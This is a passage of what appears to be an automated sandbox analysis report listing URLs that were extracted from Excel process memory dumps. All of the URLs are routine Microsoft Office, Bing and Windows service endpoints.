    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXEString found in binary or memory: https://entity.osi.office.net/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechId
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidH
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/3
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/e
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/lS
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com:.
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetrye
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?MBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1rev=
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000001.00000002.754486893.00000000129F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comej
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookq
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
